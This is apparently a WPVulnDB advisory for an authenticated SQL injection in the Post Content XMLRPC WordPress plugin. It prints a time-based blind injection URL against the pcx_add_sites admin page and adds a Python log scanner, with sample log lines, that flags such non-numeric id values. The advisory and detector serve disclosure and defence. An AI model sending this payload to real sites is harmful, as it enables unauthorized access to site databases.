wpexploit Wpvulndb WPEX-ID:FB42980C-93E5-42D5-A478-C2B348EAEA67
History Oct 07, 2021 - 12:00 a.m.

Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

2021-10-07 00:00:00
wpvulndb
127
xmlrpc
admin
sql injections
pcx_add_sites page

EPSS: 0.001
Percentile: 45.2%

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to authenticated SQL injections.

https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)
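For sites that ran the affected version, past requests of the shape shown above can be found in web server logs. The following is an added example, not code from the advisory or the plugin: it flags requests to the pcx_add_sites admin page whose id query parameter is not a plain decimal integer. The log lines are constructed samples, the assumption that a legitimate id is always an integer is mine, and parameters sent in POST bodies do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - admin [07/Oct/2021:10:00:01 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - admin [07/Oct/2021:10:02:13 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn) HTTP/1.1" 200 5120',
    '203.0.113.5 - admin [07/Oct/2021:10:03:40 +0000] "GET /wp-admin/admin.php?page=other_plugin&id=abc HTTP/1.1" 200 812',
    '203.0.113.9 - admin [07/Oct/2021:10:04:02 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=edit&id=7 HTTP/1.1" 200 5301',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
PLUGIN_PAGE = "pcx_add_sites"  # admin page named in the advisory


def suspicious_id(line):
    """Return the decoded id value if the line is a request to the plugin
    page carrying a non-integer id, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs percent-decodes values, so %20 becomes a space here.
    params = parse_qs(url.query, keep_blank_values=True)
    if PLUGIN_PAGE not in params.get("page", []):
        return None
    for value in params.get("id", []):
        # Assumption: a legitimate id is ASCII digits only.
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_id) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_id(line)) is not None]


if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric id on {PLUGIN_PAGE}: {value!r}")
```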
